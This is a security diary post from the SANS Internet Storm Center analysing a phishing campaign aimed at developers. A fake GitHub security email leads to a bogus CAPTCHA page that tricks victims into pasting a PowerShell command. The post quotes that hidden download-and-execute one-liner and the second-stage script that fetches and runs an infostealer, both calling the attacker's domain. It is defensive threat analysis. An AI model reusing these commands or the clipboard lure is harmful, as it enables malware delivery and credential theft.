Fake GitHub Site Targeting Developers, (Thu, Sep 19th)

This post was originally published on this site

Our reader "RoseSecurity" forwarded received the following malicious email:

Hey there!

We have detected a security vulnerability in your repository. Please contact us at https:[//]github-scanner[.]com  to get more information on how to fix this issue.

Best regards,
Github Security Team

GitHub has offered free security scans to users for a while now. But usually, you go directly to GitHub.com to review results, not a "scanner" site like suggested above.

The github-scanner website first displays what appears to be some form of Captcha to make sure you are "Human" (does this exclude developers?)

Clicking on "I'm not a robot" leads to this challenge screen:

Not your normal Captcha! So what is going on?

JavaScript on the website copied an exploit string into the user's clipboard. The "Windows"+R sequence opens the Windows run dialog, and the victim is enticed to execute the code. The script:

powershell.exe -w hidden -Command "iex (iwr 'https://github-scanner[.]com/download.txt').Content" # "? ''I am not a robot - reCAPTCHA Verification ID: 93752"

This simple and effective script will download and execute the "download.txt" script. The victim will likely never see the script. Due to the size of the run dialog, the victim will only see the last part of the string above, which may appear perfectly reasonable given that the victim is supposed to prove that they are human

download.txt contains:

$webClient = New-Object System.Net.WebClient
$url1 = "https:// github-scanner [.]com/l6E.exe"
$filePath1 = "$env:TEMPSysSetup.exe"
$webClient.DownloadFile($url1, $filePath1)
Start-Process -FilePath  $env:TEMPSysSetup.exe

This will download "l6E.exe" and save it as "SysSetup.exe". Luckily, l6E.exe has pretty good anti-virus coverage. On my test system, Microsoft Defender immediately recognized it [1] . It is identified as "Lumma Stealer", an information stealer. The domain is recognized by some anti-malware, but sadly not yet on Google's safe browsing blocklist.

Yes another case of Infostealers going after developers!

[1] https://www.virustotal.com/gui/file/d737637ee5f121d11a6f3295bf0d51b06218812b5ec04fe9ea484921e905a207


Johannes B. Ullrich, Ph.D. , Dean of Research, SANS.edu
Twitter|

(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.

Leave a Reply

This site uses Akismet to reduce spam. Learn how your comment data is processed.